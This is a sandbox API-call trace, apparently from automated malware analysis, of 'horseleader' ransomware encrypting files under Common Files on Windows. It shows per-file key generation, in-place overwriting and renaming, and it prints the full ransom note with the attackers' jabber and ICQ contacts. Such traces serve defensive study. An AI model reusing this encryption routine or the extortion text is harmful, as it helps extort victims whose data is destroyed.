lstrcmpW (lpString1="ARCTIC.INF", lpString2="#Decrypt#.txt") returned 1 [0246.042] lstrcmpW (lpString1="ARCTIC.INF", lpString2="_uninstalling_.png") returned 1 [0246.042] lstrlenW (lpString=".testttjffg") returned 11 [0246.042] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF", lpSrch=".testttjffg") returned 0x0 [0246.042] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.042] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.042] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.043] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF") returned 77 [0246.043] StrStrW (lpFirst="ARCTIC.INF", lpSrch=".txt") returned 0x0 [0246.043] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=513) returned 1 [0246.044] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x201, lpOverlapped=0x0) returned 1 [0246.045] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.045] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x201, lpOverlapped=0x0) returned 1 [0246.045] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.045] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.045] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.046] CloseHandle (hObject=0x1a4) returned 1 [0246.046] GetProcessHeap () returned 0x780000 [0246.046] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.046] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF.horseleader") returned 89 [0246.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.inf.horseleader")) returned 1 [0246.052] GetProcessHeap () returned 0x780000 [0246.052] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.052] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xba9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.052] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.052] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 78 [0246.053] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.053] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.053] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.053] lstrlenW (lpString=".testttjffg") returned 11 [0246.053] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.053] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.053] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.055] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 78 [0246.055] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.055] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2985) returned 1 [0246.055] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xba9, lpOverlapped=0x0) returned 1 [0246.057] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff457, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.057] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xba9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xba9, lpOverlapped=0x0) returned 1 [0246.058] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.058] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.058] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.058] CloseHandle (hObject=0x1a4) returned 1 [0246.058] GetProcessHeap () returned 0x780000 [0246.058] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.058] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.horseleader") returned 90 [0246.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.horseleader")) returned 1 [0246.060] GetProcessHeap () returned 0x780000 [0246.060] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.060] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x4d44, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.060] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.060] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 79 [0246.060] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.060] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.060] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.060] lstrlenW (lpString=".testttjffg") returned 11 [0246.060] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.060] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.060] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.062] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 79 [0246.062] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.062] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19780) returned 1 [0246.062] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4d44, lpOverlapped=0x0) returned 1 [0246.065] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb2bc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.065] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4d44, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4d44, lpOverlapped=0x0) returned 1 [0246.065] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.066] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.066] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.066] CloseHandle (hObject=0x1a4) returned 1 [0246.066] GetProcessHeap () returned 0x780000 [0246.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.067] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.horseleader") returned 91 [0246.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.horseleader")) returned 1 [0246.068] GetProcessHeap () returned 0x780000 [0246.068] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.068] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x4d44, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.068] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.068] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\#Decrypt#.txt") returned 80 [0246.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.069] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.069] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.071] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.071] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.071] CloseHandle (hObject=0x158) returned 1 [0246.071] GetProcessHeap () returned 0x780000 [0246.071] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.071] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="AXIS", cAlternateFileName="")) returned 1 [0246.071] lstrcmpiW (lpString1="AXIS", lpString2="Windows") returned -1 [0246.072] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS") returned 64 [0246.072] lstrcmpW (lpString1="AXIS", lpString2=".") returned 1 [0246.072] lstrcmpW (lpString1="AXIS", lpString2="..") returned 1 [0246.072] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.072] GetProcessHeap () returned 0x780000 [0246.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.072] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*") returned 66 [0246.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.074] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.074] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\.") returned 66 [0246.074] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.074] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.074] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.074] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\..") returned 67 [0246.074] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.075] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.075] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd394600, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd394600, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x189be, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AXIS.ELM", cAlternateFileName="")) returned 1 [0246.075] lstrcmpiW (lpString1="AXIS.ELM", lpString2="Windows") returned -1 [0246.075] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned 73 [0246.075] StrStrIW (lpFirst="AXIS.ELM", lpSrch=".horseleader") returned 0x0 [0246.075] lstrcmpW (lpString1="AXIS.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.075] lstrcmpW (lpString1="AXIS.ELM", lpString2="_uninstalling_.png") returned 1 [0246.075] lstrlenW (lpString=".testttjffg") returned 11 [0246.075] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM", lpSrch=".testttjffg") returned 0x0 [0246.075] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.075] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned 73 [0246.076] StrStrW (lpFirst="AXIS.ELM", lpSrch=".txt") returned 0x0 [0246.076] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=100798) returned 1 [0246.076] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.076] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.080] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.080] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.080] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x9cdf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.080] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.081] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.082] 